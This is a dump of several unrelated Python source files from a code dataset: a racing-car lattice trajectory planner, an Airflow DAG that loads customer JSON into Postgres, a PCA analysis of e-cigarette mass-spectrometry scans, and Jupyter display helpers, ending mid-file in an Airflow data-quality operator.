temp_traj = np.empty((trajectory_generator.NUM_STEPS, 5))\n temp_traj[:,:4] = trajectory_generator_utils.multiInterp2(np.linspace(0,s_idx[-1],trajectory_generator.NUM_STEPS), s_idx, self.prev_traj[idx:,:4])\n temp_traj[:,4] = np.concatenate([np.geomspace(current_vel,0.4,BRAKE_STEPS), 0.4*np.ones((temp_traj.shape[0]-BRAKE_STEPS,))])\n self.prev_traj = temp_traj\n self.limp_s += s_tot[idx]\n self.prev_param[0] = s_idx[-1]\n self.is_limping = True\n # END NEW\n # OLD\n #self.prev_traj[:,4] = np.concatenate([np.geomspace(self.prev_traj[0,4],0.4,BRAKE_STEPS), 0.4*np.ones((self.prev_traj.shape[0]-BRAKE_STEPS,))])\n # END OLD\n prev_traj_plot = self.prev_traj\n pp_traj = np.empty((self.prev_traj.shape[0], 4))\n pp_traj[:, 0:2] = self.prev_traj[:, 0:2]\n pp_traj[:, 2] = self.prev_traj[:, 4]\n pp_traj[:, 3] = self.prev_traj[:, 2]\n return pp_traj, prev_traj_plot\n\n\n def compute_action(self, pp_traj, safety_flag, pose, off_policy=False):\n pose_x, pose_y, pose_theta = pose\n\n if safety_flag:\n next_speed, next_steer = self._pure_pursuit(pose_x, pose_y, pose_theta, pp_traj, self.track_lad)\n next_steer = self.STEER_LP*next_steer+(1-self.STEER_LP)*self.prev_steer\n\n elif off_policy:\n next_speed, next_steer = self._pure_pursuit(pose_x, pose_y, pose_theta, self.waypoints[:, 0:4], self.track_lad)\n next_steer = self.STEER_LP*next_steer+(1-self.STEER_LP)*self.prev_steer\n\n else:\n next_speed, next_steer = self._pure_pursuit(pose_x, pose_y, pose_theta, pp_traj, self.track_lad)\n\n self.prev_steer = next_steer\n\n return next_speed, next_steer\n\ndef getLimpParametersStatic(pose_x, pose_y, current_vel, prev_traj_self, prev_param_self):\n # NEW\n prev_traj = np.copy(prev_traj_self)\n prev_param = np.copy(prev_param_self)\n s_tot = np.linspace(0, prev_param[0], trajectory_generator.NUM_STEPS)\n s_tot -= s_tot[0]\n _, _, _, idx = pure_pursuit_utils.nearest_point_on_trajectory_py2(np.array([pose_x, pose_y]), prev_traj[:,:2])\n idx = min(idx, prev_traj.shape[0]-3)\n s_idx = s_tot[idx:]\n s_idx -= s_idx[0]\n temp_traj = np.empty((trajectory_generator.NUM_STEPS, 5))\n temp_traj[:,:4] = trajectory_generator_utils.multiInterp2(np.linspace(0,s_idx[-1],trajectory_generator.NUM_STEPS), s_idx, prev_traj[idx:,:4])\n temp_traj[:,4] = np.concatenate([np.geomspace(current_vel,0.4,BRAKE_STEPS), 0.4*np.ones((temp_traj.shape[0]-BRAKE_STEPS,))])\n prev_traj = temp_traj\n extra_limp_s = s_tot[idx]\n prev_param[0] = s_idx[-1]\n # END NEW\n # OLD\n #self.prev_traj[:,4] = np.concatenate([np.geomspace(self.prev_traj[0,4],0.4,BRAKE_STEPS), 0.4*np.ones((self.prev_traj.shape[0]-BRAKE_STEPS,))])\n # END OLD\n pp_traj = np.empty((prev_traj.shape[0], 4))\n pp_traj[:, 0:2] = prev_traj[:, 0:2]\n pp_traj[:, 2] = prev_traj[:, 4]\n pp_traj[:, 3] = prev_traj[:, 2]\n return pp_traj, prev_traj, prev_param, extra_limp_s\n\nclass RobustLatticePlanner(LatticePlanner):\n def __init__(self, map_path, waypoints, directory, cost_weights=None, is_ego=False):\n # cost_weights is one cost weights, for ego car / plan_robust, cost_weights_list is list of cost weights of other guys, for opponents / plan_multiple\n super().__init__(map_path, cost_weights, waypoints, directory, is_ego)\n\n def plan_multiple(self, pose, opp_pose, sampled_flow_list, other_prev_traj, other_prev_param, ds, current_vel, picked_cost_weights, picked_belief):\n # how to deal with similarity cost: highest belief from last\n # sampled_flow_list is (3d: num_arms_pulled x num_samples x 6)\n\n current_vel = max(0.01, current_vel)\n pose_x, pose_y, pose_theta = pose\n num_guys = picked_belief.shape[0]\n\n output_traj_list = [None]*num_guys\n output_param_list = [None]*num_guys\n\n if other_prev_traj is None or other_prev_param is None:\n # what ego thinks the other guys think about what ego wants to do\n other_prev_param = np.array([5., 0, 0, 0, 0])\n other_prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n temp = np.linspace(0., 5., trajectory_generator.NUM_STEPS)\n other_prev_traj[:, 0] = opp_pose[0]+temp*np.cos(opp_pose[2])\n other_prev_traj[:, 1] = opp_pose[1]+temp*np.sin(opp_pose[2])\n other_prev_traj[:, 4] = trajectory_generator_utils.WAYPOINT_SPEED\n\n if self.prev_traj is None or self.prev_param is None:\n self.prev_param = np.array([5., 0, 0, 0, 0])\n self.prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n temp = np.linspace(0., 5., trajectory_generator.NUM_STEPS)\n self.prev_traj[:, 0] = pose[0]+temp*np.cos(pose[2])\n self.prev_traj[:, 1] = pose[1]+temp*np.sin(pose[2])\n self.prev_traj[:,2] = pose[2]\n self.prev_traj[:, 4] += trajectory_generator_utils.WAYPOINT_SPEED\n self.prev_steer = 0.0\n return [self.prev_traj]*num_guys, [self.prev_param]*num_guys\n\n # stack the output and transform into 2d matrix\n sampled_flow_stacked = sampled_flow_list.reshape((sampled_flow_list.shape[0]*sampled_flow_list.shape[1], sampled_flow_list.shape[2]))\n # start = time.time()\n # lookup_grid, current_s, new_s = self.flow_to_xytheta(sampled_flow_stacked[:, 0:3], pose)\n\n lookup_grid, current_s, new_s, corner_on = flow_to_xytheta_static(sampled_flow_stacked[:, 0:3], np.array(pose), self.waypoints, self.lut_resolution, self.speed_lut_numba, self.WINDOW_SIZE, self.CURVATURE_THRESH, self.CORNER_ON)\n self.CORNER_ON = corner_on\n # print('flow_to_xytheta multiple numba time', time.time()-start)\n # lookup_grid will be (2d: num_arms_pulled*num_samples x 3)\n # current_s and new_s are (num_arms_pulled*num_samples, )\n\n if lookup_grid is None:\n # car's current pose not in lut\n # pp_traj = self.waypoints[:, 0:4]\n pp_traj, prev_traj, prev_param, extra_limp_s = getLimpParametersStatic(pose_x, pose_y, current_vel, self.prev_traj, self.prev_param)\n self.prev_traj = prev_traj\n self.prev_param = prev_param\n self.limp_s += extra_limp_s\n return [prev_traj]*num_guys, [self.prev_param]*num_guys\n\n kappa0 = trajectory_generator.get_curvature_command(np.roll(self.prev_param,-1), ds+self.limp_s) if self.prev_param is not None else 0.0\n\n # traj lookup\n rot = self._rotation_matrix(pose_theta, (0, 0, 1))\n states_list_local, parameters_list, filtered_flow_list, num_traj_list = trajectory_generator_utils.grid_lookup_parallel(lookup_grid, self.lut_x, self.lut_y, self.lut_theta, self.lut_kappa, self.lut, kappa0, self.lut_stepsizes, num_guys, sampled_flow_list)\n\n for i in range(len(num_traj_list)):\n if num_traj_list[i] == 0:\n pp_traj, prev_traj, prev_param, _ = getLimpParametersStatic(pose_x, pose_y, current_vel, self.prev_traj, self.prev_param)\n output_traj_list[i] = prev_traj\n output_param_list[i] = prev_param\n\n states_list = trajectory_generator_utils.trans_traj_list_multiple(states_list_local, np.array([[pose_x], [pose_y], [0.0]]), rot)\n\n # check for zero numtraj guys:\n for i in range(len(num_traj_list)):\n if num_traj_list[i] == 0:\n states_list[i] = output_traj_list[i]\n parameters_list[i] = output_param_list[i][None, :]\n # num_traj_list[i] = 1\n\n # dspeed_list = [filtered_flow[:, 3:] for filtered_flow in filtered_flow_list]\n dspeed_list = List()\n for filtered_flow in filtered_flow_list:\n dspeed_list.append(np.ascontiguousarray(filtered_flow[:, 3:]))\n new_states_list = trajectory_generator_utils.get_velocity_profile_multiple(states_list, self.waypoints, dspeed_list, num_traj_list, current_vel)\n\n for i in range(len(num_traj_list)):\n if num_traj_list[i] == 0:\n num_traj_list[i] = 1\n\n # cost calculation\n \n\n opp_relative_weights = np.array([1.])\n\n traj_costs_list, end_xy_list = trajectory_generator_utils.get_traj_list_cost_multiple(states_list, new_states_list, picked_cost_weights, self.waypoints, self.prev_traj, parameters_list, other_prev_traj, np.array([other_prev_param]), opp_relative_weights)\n # traj_costs[0,:] = trajectory_generator_utils.get_lane_cost_traj_list_nonnumba(states_list, num_traj, self.speed_lut, self.lut_resolution)\n trajectory_generator_utils.get_s_cost_wlut_multiple(traj_costs_list, states_list, num_traj_list, self.waypoints, self.speed_lut_numba, self.lut_resolution)\n trajectory_generator_utils.get_range_costs_multiple(traj_costs_list, states_list, num_traj_list, self.range_lut_numba, self.lut_resolution)\n trajectory_generator_utils.get_progress_costs_multiple(traj_costs_list, end_xy_list, opp_relative_weights, num_traj_list, self.speed_lut_numba, self.lut_resolution)\n\n # summing with cost weights\n traj_costs_final_list = trajectory_generator_utils.sum_cost_multiple(traj_costs_list, picked_cost_weights)\n\n empty_cost_flag = False\n is_inf_flag = False\n safety_flag = False\n\n lowest_cost_idx_list = [np.argmin(traj_costs_final_list[i]) for i in range(num_guys)]\n picked_traj_list = [new_states_list[i][lowest_cost_idx_list[i]*trajectory_generator.NUM_STEPS:(lowest_cost_idx_list[i]+1)*trajectory_generator.NUM_STEPS, :] for i in range(num_guys)]\n picked_params_list = [parameters_list[i][lowest_cost_idx_list[i], :] for i in range(num_guys)]\n\n max_belief_idx = np.argmax(picked_belief)\n\n # go to limp mode if max belief cost is inf\n # also change picked traj for all inf cost guys to limp mode?\n for i in range(num_guys):\n if np.isinf(traj_costs_final_list[i][lowest_cost_idx_list[i]]):\n pp_traj, prev_traj, prev_param, extra_limp_s = getLimpParametersStatic(pose_x, pose_y, current_vel, self.prev_traj, self.prev_param)\n if max_belief_idx == i:\n self.limp_s += extra_limp_s\n picked_params_list[i] = prev_param\n picked_traj_list[i] = prev_traj\n elif max_belief_idx == i:\n self.limp_s = 0.\n\n self.prev_param = picked_params_list[max_belief_idx]\n self.prev_traj = picked_traj_list[max_belief_idx]\n\n return picked_traj_list, picked_params_list\n\n def plan_robust(self, pose, opp_pose, sampled_flow, other_prev_traj, other_prev_param, ds, current_vel, picked_idx_count, ballsize):\n current_vel = max(0.01, current_vel)\n pose_x, pose_y, pose_theta = pose\n # other prev_traj and prev_param are lists, could have repeats\n # lookup_grid, current_s, new_s = self.flow_to_xytheta(sampled_flow[:, 0:3], pose)\n lookup_grid, current_s, new_s, corner_on = flow_to_xytheta_static(sampled_flow[:, 0:3], np.array(pose), self.waypoints, self.lut_resolution, self.speed_lut_numba, self.WINDOW_SIZE, self.CURVATURE_THRESH, self.CORNER_ON)\n self.CORNER_ON = corner_on\n if lookup_grid is None:\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n self.prev_flow = None\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n kappa0 = trajectory_generator.get_curvature_command(np.roll(self.prev_param,-1), ds+self.limp_s) if self.prev_param is not None else 0.0\n \n emp_w = 1. * picked_idx_count / np.sum(picked_idx_count)\n # traj lookup\n rot = self._rotation_matrix(pose_theta, (0, 0, 1))\n # start = time.time()\n states_list_local, parameters_list, filtered_flow, filtered_grid, filtered_new_s = trajectory_generator_utils.grid_lookup(lookup_grid, self.lut_x, self.lut_y, self.lut_theta, self.lut_kappa, self.lut, sampled_flow, new_s, kappa0, self.lut_stepsizes)\n num_traj = parameters_list.shape[0]\n # print('grid lookup time', time.time()-start)\n\n if num_traj == 0:\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n self.prev_flow = None\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n\n states_list = trajectory_generator_utils.trans_traj_list(states_list_local, np.array([[pose_x], [pose_y], [0.0]]), rot)\n\n dspeed = filtered_flow[:, 3:]\n # start = time.time()\n new_states_list = trajectory_generator_utils.get_velocity_profile(states_list, self.waypoints, dspeed, num_traj, current_vel)\n # print('get vel profile time', time.time()-start)\n\n\n # cost calculation\n\n # TODO: move this to plan multiple so it never returns None\n # if other_prev_traj is None or other_prev_param is None:\n # other_prev_param = np.array([[5., 0, 0, 0, 0]])\n # other_prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n # other_prev_traj[:, 0] = np.linspace(opp_pose[0], opp_pose[0]+5., trajectory_generator.NUM_STEPS)\n # other_prev_traj[:, 4] += 8.\n # self.prev_flow = None\n\n if self.prev_traj is None or self.prev_param is None:\n self.prev_param = np.array([5., 0, 0, 0, 0])\n self.prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n temp = np.linspace(0., 5., trajectory_generator.NUM_STEPS)\n self.prev_traj[:, 0] = pose[0]+temp*np.cos(pose[2])\n self.prev_traj[:, 1] = pose[1]+temp*np.sin(pose[2])\n self.prev_traj[:,2] = pose[2]\n self.prev_traj[:, 4] += trajectory_generator_utils.WAYPOINT_SPEED\n self.prev_flow = None\n self.prev_steer = 0.0 \n prev_traj_plot = self.prev_traj\n pp_traj = np.empty((self.prev_traj.shape[0], 4))\n pp_traj[:, 0:2] = self.prev_traj[:, 0:2]\n pp_traj[:, 2] = self.prev_traj[:, 4]\n pp_traj[:, 3] = self.prev_traj[:, 2]\n return pp_traj, False, self.prev_flow, None, prev_traj_plot, lookup_grid\n\n # opp_relative_weights = np.array([1.])\n\n # start = time.time()\n traj_costs, end_xy, long_cost = trajectory_generator_utils.get_traj_list_cost_robust(states_list, new_states_list, self.cost_weights, self.waypoints, self.prev_traj, parameters_list, other_prev_traj, other_prev_param, emp_w)\n # print('traj list cost robust', time.time() - start)\n # traj_costs[0,:] = trajectory_generator_utils.get_lane_cost_traj_list_nonnumba(states_list, num_traj, self.speed_lut, self.lut_resolution)\n # start = time.time()\n traj_costs[4, :] = trajectory_generator_utils.get_s_cost_wlut(states_list, num_traj, self.waypoints, self.speed_lut_numba, self.lut_resolution)\n # print('4 cost', time.time()-start)\n # start = time.time()\n traj_costs[9, :] = trajectory_generator_utils.get_range_costs(states_list, num_traj, self.range_lut_numba, self.lut_resolution)\n # print('9 cost', time.time()-start)\n # traj_costs[13, :] = trajectory_generator_utils.get_progress_costs(end_xy, opp_relative_weights, num_traj, self.speed_lut, self.lut_resolution)\n # start = time.time()\n progress_cost = trajectory_generator_utils.get_progress_costs_robust(end_xy, long_cost.shape[0], num_traj, self.speed_lut_numba, self.lut_resolution)\n # print('progress cost robust time', time.time()-start)\n # traj_costs[14, :] = np.zeros((num_traj, ))\n\n combined_robust_cost = trajectory_generator_utils.get_robust_cost(long_cost, self.cost_weights[11], progress_cost, self.cost_weights[12], picked_idx_count, ballsize)\n\n # summing with cost weights\n traj_costs_final = trajectory_generator_utils.sum_cost(traj_costs, self.cost_weights[:-2]) + combined_robust_cost\n\n empty_cost_flag = False\n is_inf_flag = False\n safety_flag = False\n\n try:\n # lowest_cost_idx = np.argmin(traj_costs_final)\n non_inf_idx = np.where(np.isfinite(traj_costs_final))[0]\n non_inf_costs = traj_costs_final[non_inf_idx]\n k = min(self.TOP_POP_NUM - 1, non_inf_costs.shape[0])\n lowest_cost_idx_top = np.argpartition(non_inf_costs, k)[:k+1]\n lowest_cost_idx = np.argmin(non_inf_costs[lowest_cost_idx_top])\n lowest_cost_idx = lowest_cost_idx_top[lowest_cost_idx]\n lowest_cost_idx = non_inf_idx[lowest_cost_idx]\n\n # print(traj_costs[:, lowest_cost_idx])\n # /np.sum(traj_costs[:, lowest_cost_idx]))\n\n # dxdy = filtered_grid[lowest_cost_idx, 0:2]\n # cond = self.corner(current_s)\n # if np.isinf(traj_costs_final[lowest_cost_idx]):\n # is_inf_flag = True\n # self.prev_flow = None\n # else:\n best_traj = new_states_list[lowest_cost_idx*trajectory_generator.NUM_STEPS:(lowest_cost_idx+1)*trajectory_generator.NUM_STEPS, :]\n self.prev_traj = best_traj\n pp_traj = np.empty((best_traj.shape[0], 4))\n pp_traj[:, 0:2] = best_traj[:, 0:2]\n pp_traj[:, 2] = best_traj[:, 4]\n pp_traj[:, 3] = best_traj[:, 2]\n self.prev_flow = (filtered_flow[non_inf_idx, :])[lowest_cost_idx_top, :]\n self.prev_param = parameters_list[lowest_cost_idx, :]\n self.is_limping = False\n self.limp_s = 0.\n\n except ValueError:\n empty_cost_flag = True\n is_inf_flag = True\n self.prev_flow = None\n\n if empty_cost_flag or is_inf_flag:\n #safety_flag = True\n #states_list_plot = None\n #prev_traj_plot = None\n #pp_traj = self.waypoints[:, 0:4]\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n else:\n states_list_plot = states_list\n prev_traj_plot = self.prev_traj\n # print('\\n')\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n","sub_path":"python/mpc/lattice_planner.py","file_name":"lattice_planner.py","file_ext":"py","file_size_in_byte":38694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"491607582","text":"import pandas as pd\r\nimport json\r\nfrom sqlalchemy import create_engine\r\n\r\nimport airflow\r\nfrom airflow.models import DAG,Variable\r\nfrom airflow.operators.python_operator import PythonOperator\r\nfrom datetime import datetime, date\r\n\r\nargs = {\r\n 'owner': 'airflow',\r\n 'start_date': datetime(2020, 3, 2),\r\n 'depends_on_past': False,\r\n 'email': ['jesse.mikkola@houston-analytics.com']\r\n}\r\n\r\ndag = DAG(\r\n dag_id='kotipizza_customers_json_to_db',\r\n default_args=args,\r\n schedule_interval='0 5 * * *',\r\n max_active_runs=1\r\n)\r\n\r\n\r\ndef json_to_db():\r\n\tdf = pd.read_json(\"/home/houston/data_land/koti_custo_customers.json\")\r\n\r\n\tprint(df)\r\n\r\n\tengine = create_engine('postgresql://postgres:docker@localhost:5432/test_data')\r\n\t#These 2 lines added to drop table, haven't tested\r\n\tsql = 'DROP TABLE IF EXISTS kotipizza_customers;'\r\n\tresult = engine.execute(sql)\r\n\r\n\tdf.to_sql('kotipizza_customers', engine)\r\n\r\n\r\ndag_products = PythonOperator(\r\n\ttask_id='kotipizza_customers_json_to_db',\r\n\tpython_callable=json_to_db,\r\n\tdag=dag,\r\n\t)\r\n\r\n\r\n","sub_path":"DAGs/customers_fetch_insert.py","file_name":"customers_fetch_insert.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"250387837","text":"'''pca comparing e-cigarettes\njuul\nHalo(G7)\nBlu\n'''\n\nimport csv, matplotlib.pyplot as plt, numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\n\n# constants\nMZSTART = 15\nMZEND = 400\nINDEX = 1\nNUMBER_OF_CIG = 3\nNUMBER_OF_IONS = 8\n# precursor ion list \nH3O = 19 #index 0\nNO = 30 #index 1\nO2 = 32 #index 2 pos, 3 neg\nOH = 17 #index 4\nO = 16 #index 5\nNO2 = 46 #index 6\nNO3 = 62 #index 7\n\n\nfiles = [\n# trial 1 \n'mass-scan-pos-neg-4-13-18-4600-20180622-142124.csv', #g6\n'mass-scan-pos-neg-4-13-18-4607-20180622-150245.csv', #juul\n'mass-scan-pos-neg-4-13-18-4608-20180622-151114.csv', #blu\n#trial 2\n'mass-scan-pos-neg-4-13-18-4619-20180622-184858.csv', #g6\n'mass-scan-pos-neg-4-13-18-4615-20180622-182527.csv', #juul\n'mass-scan-pos-neg-4-13-18-4623-20180622-190449.csv', #blu\n#trial 3\n'mass-scan-pos-neg-4-13-18-4663-20180625-174200.csv', #g6\n'mass-scan-pos-neg-4-13-18-4659-20180625-172435.csv', #juul\n'mass-scan-pos-neg-4-13-18-4667-20180625-180620.csv', # blu\n#trial 4\n'mass-scan-pos-neg-4-13-18-4697-20180626-160732.csv', #g6\n'mass-scan-pos-neg-4-13-18-4690-20180626-153051.csv', #juul\n'mass-scan-pos-neg-4-13-18-4701-20180626-162915.csv', #blu\n#trial 5\n'mass-scan-pos-neg-4-13-18-4840-20180628-172915.csv', #g6\n'mass-scan-pos-neg-4-13-18-4836-20180628-171152.csv', #juul\n'mass-scan-pos-neg-4-13-18-4841-20180628-173842.csv', #blu\n#trial 6\n'mass-scan-pos-neg-4-13-18-4897-20180702-165302.csv', # g6\n'mass-scan-pos-neg-4-13-18-4893-20180702-162712.csv', # juul\n'mass-scan-pos-neg-4-13-18-5115-20180710-124320.csv', # blu\n# trial 7\n'mass-scan-pos-neg-4-13-18-5110-20180710-122638.csv', # g6\n'mass-scan-pos-neg-4-13-18-5098-20180709-191303.csv', # juul\n'mass-scan-pos-neg-4-13-18-5122-20180710-131215.csv' # blu\n]\n\n\n# helper function - standardization bef pca \ndef getStd(vals):\n\tstdComp = []\n\tfor val in vals:\n\t\tcomp.append(StandardScaler().fit_transform(val))\n\treturn stdComp\n\n\n# helper functions for visualization\n# add label when in order of g6/juul/blu\ndef getlabel(index):\n\t'''if index % NUMBER_OF_CIG == 0:\n\t\treturn 'G6 '+ str(index/3)\n\telif index % NUMBER_OF_CIG == 1 :\n\t\treturn 'Juul ' + str(index/3)\n\telse:\n\t\treturn 'Blu ' + str(index/3)'''\n\tif index % NUMBER_OF_IONS == 0:\n\t\treturn 'H3O+'\n\telif index % NUMBER_OF_IONS == 1:\n\t\treturn 'NO+'\n\telif index % NUMBER_OF_IONS == 2:\n\t\treturn 'O2+'\n\telif index % NUMBER_OF_IONS == 4:\n\t\treturn 'O2-'\n\telif index % NUMBER_OF_IONS == 5:\n\t\treturn 'O-'\n\telif index % NUMBER_OF_IONS == 6:\n\t\treturn 'OH-'\n\telif index % NUMBER_OF_IONS == 7:\n\t\treturn 'NO2-'\n\telse:\n\t\treturn 'NO3-'\n\n# helper functions for visualization \n# add label for each ions\ndef getcolor(index):\n\tif index % NUMBER_OF_IONS == 0:\n\t\treturn 'red'\n\telif index % NUMBER_OF_IONS == 1:\n\t\treturn 'blue'\n\telif index % NUMBER_OF_IONS == 2:\n\t\treturn 'green'\n\telif index % NUMBER_OF_IONS == 4:\n\t\treturn 'purple'\n\telif index % NUMBER_OF_IONS == 5:\n\t\treturn 'orange'\n\telif index % NUMBER_OF_IONS == 6:\n\t\treturn 'brown'\n\telif index % NUMBER_OF_IONS == 7:\n\t\treturn 'olive'\n\telse:\n\t\treturn 'pink'\n\n# import data from csv files \n# crucial data structure extracted across diff files \ndata_H3O, data_NO, data_O2pos, data_O2neg, data_OH, data_O, data_NO2, data_NO3 = ([] for i in range(8))\n\nfor file in files:\n\twith open('p_e_' + file, 'r') as csv_file:\n\t\tcsv_reader = csv.reader(csv_file)\n\t\tarray1, array2, array3, array4, array5, array6, array7, array8 = ([] for i in range(8))\n\n\t\tfor line in csv_reader: \n\t\t\tif(line[0]==str(H3O) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray1.append(float(line[2]))\n\t\t\telif(line[0]==str(NO) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray2.append(float(line[2]))\n\t\t\telif(line[0]==str(O2) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tif len(array3) < (MZEND - MZSTART + 1):\n\t\t\t\t\tarray3.append(float(line[2]))\n\t\t\t\telse:\n\t\t\t\t\tarray4.append(float(line[2]))\n\t\t\telif(line[0]==str(O) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray5.append(float(line[2]))\n\t\t\telif(line[0]==str(OH) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray6.append(float(line[2]))\n\t\t\telif(line[0]==str(NO2) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray7.append(float(line[2]))\n\t\t\telif(line[0]==str(NO3) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray8.append(float(line[2]))\n\n\t\tdata_H3O.append(array1)\n\t\tdata_NO.append(array2)\n\t\tdata_O2pos.append(array3)\n\t\tdata_O2neg.append(array4)\n\t\tdata_O.append(array5)\n\t\tdata_OH.append(array6)\n\t\tdata_NO2.append(array7)\n\t\tdata_NO3.append(array8)\n\ndata = [data_H3O, data_NO, data_O2pos, data_O2neg, data_OH, data_O, data_NO2, data_NO3]\nY = []\npca = PCA(n_components=2)\n\n\n# standardize then run pca analysis\nfor d in data:\n\tstd_data = StandardScaler().fit_transform(d)\n\tY.append(pca.fit_transform(std_data))\n\n# rendering PCA data \n#fig = plt.figure(figsize=(10,6))\n\ni = 0\nfor y in Y:\n\tplt.scatter(y[:,0], y[:,1], marker='o', alpha=0.7, color=getcolor(i), label=getlabel(i))\n\ti += 1\n\t\nplt.xlabel('First Principal Component')\nplt.ylabel('Second Principal Component')\nplt.title('PCA analysis of 7 trials with minimal processing')\nplt.legend(loc=1)\nplt.show()\n\n","sub_path":"analysis/ec1/pcaIon.py","file_name":"pcaIon.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"183387349","text":"#!/usr/bin/env python\n\nfrom IPython.display import display, Markdown, Math, Latex\nfrom cycler import cycler\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sympy as sp\nimport string\n\ndef head(exp):\n display(Markdown(\"### \" + exp))\n\ndef subhead(exp):\n display(Markdown(\"#### \" + exp))\n\ndef desc(exp):\n display(Markdown(\"*\" + exp + \"*\"))\n\ndef pycode(exp, description=None):\n display(Markdown(\"```python\\n\" + exp + \"```\"))\n if description is not None:\n display(Markdown(\"*\" + description + \"*\"))\n #display( eval(exp) )\n print(\"\")\n print(\"\")\n\ndef print_matrix(nd, format_str=\"{:.2f}\", max_vertex_row=6, font_size=\"small\"):\n s = \"{\\\\\" + font_size + \" \\n\\\\begin{bmatrix}\\n\" \n for ir, r in enumerate(nd):\n try:\n for ic, c in enumerate(r):\n s += str(c) if nd.dtype.name[0:3]=='int' else format_str.format(c)\n if ic < len(r)-1:\n s += \"& \"\n s += \"\\\\\\\\\\n\"\n except TypeError:\n if ir>0 and ir % max_vertex_row == 0:\n s += \"\t…\\\\\\\\\\n\" \n s += str(r) if nd.dtype.name[0:3]=='int' else format_str.format(r)\n if ir < len(nd)-1:\n s += \"& \"\n s += \"\\n\\\\end{bmatrix}\\n}\"\n display(Math( s ))\n \ndef print_table(array):\n\n \"\"\" Input: Python list with rows of table as lists\n First element as header. \n Output: String to put into a .md file \n \n Ex Input: \n [[\"Name\", \"Age\", \"Height\"],\n [\"Jake\", 20, 5'10],\n [\"Mary\", 21, 5'7]] \n \"\"\"\n\n\n markdown = \"\\n\" + str(\"| \")\n\n for e in array[0]:\n to_add = \" \" + str(e) + str(\" |\")\n markdown += to_add\n markdown += \"\\n\"\n\n markdown += '|'\n for i in range(len(array[0])):\n markdown += str(\"-------------- | \")\n markdown += \"\\n\"\n\n for entry in array[1:]:\n markdown += str(\"| \")\n for e in entry:\n to_add = str(e) + str(\" | \")\n markdown += to_add\n markdown += \"\\n\"\n\n display( Markdown( markdown + \"\\n\" ))\n\ndef ndarray_props(a, typename=None):\n descriptions = {\n 'base': 'Base class',\n 'data': 'Mem location',\n 'dtype': 'Element datatype',\n 'itemsize': 'Item size',\n 'ndim': '# Dimensions',\n 'nbytes': '# Bytes',\n 'newbyteorder': 'New byte order',\n 'shape': 'Shape',\n 'size': 'Size',\n 'strides': 'Strides'\n }\n if typename == None:\n typename = a.dtype\n\n subhead(f'NDArray properties for {typename}')\n table = [[v, f'arr.{k}', f'{ getattr(a, k) }'] for k,v in descriptions.items()]\n table.insert(0, ['Description', 'Property', 'Value'])\n print_table(table)\n\ndef ndarray_flags(a):\n subhead('NDArray flags')\n flag_Table = [r.split(':') for r in str(a.flags).split('\\n')]\n flag_Table.insert(0, ['Flag', 'Value'])\n print_table( flag_Table )\n \ndef lb():\n display(Markdown(\"----\"))\n\ndef configure_plot(xlim, ylim, figsize=(12, 8), subplots=1, colors=['teal', 'seagreen', 'blue', 'limegreen', 'royalblue', 'deepskyblue', 'slateblue'] ):\n fig = plt.figure(figsize=figsize)\n plt.rc('axes', prop_cycle=(cycler('color', colors)))\n plt.xlim(xlim[0], xlim[1])\n plt.ylim(ylim[0], ylim[1])\n if (subplots==1):\n return plt\n elif (subplots==2):\n p1 = configure_subplot(fig.add_subplot(1,2,1))\n p2 = configure_subplot(fig.add_subplot(1,2,2))\n return p1, p2\n\ndef configure_subplot(sp):\n sp.grid(True, which='both', color='lavender')\n sp.axhline(y=0, color='lightsteelblue')\n sp.axvline(x=0, color='lightsteelblue')\n return sp\n\ndef print_eq(*args):\n formated_lines = [l[0].format(*[sp.latex(a) for a in l[1:]]) for l in args]\n s = '\\\\begin{equation}\\n'\n s += '\\\\begin{split}\\n'\n s += ' \\\\\\\\\\n'.join(formated_lines) + ' \\\\\\\\\\n'\n s += '\\\\end{split}\\n'\n s += '\\\\end{equation}'\n display(Math(s))","sub_path":"notebooks/python-data-science/.ipynb_checkpoints/display_helpers-checkpoint.py","file_name":"display_helpers-checkpoint.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"193400601","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass DataQualityOperator(BaseOperator):\n '''\n Dag Operator for running data quality queries and comparing the output to expected output\n '''\n ui_color = '#89DA59'\n\n @apply_defaults\n def __init__(self,\n redshift_conn_id=\"\",\n check_query=\"\",\n expected_count=\"\",\n *args, **kwargs):\n\n super(DataQualityOperator, self).__init__(*args, **kwargs)\n self.conn_id = redshift_conn_id\n self.check_query = check_query\n self.expected_count = expected_count\n\n def execute(self, context):\n self.log.info('Running Data quality checks')\n redshift = PostgresHook(postgres_conn_id = self.conn_id)\n \n data_quality_check_sql = self.check_query\n rec_count = redshift.get_records(data_quality_check_sql)\n num_records = rec_count[0][0]\n if num_records > 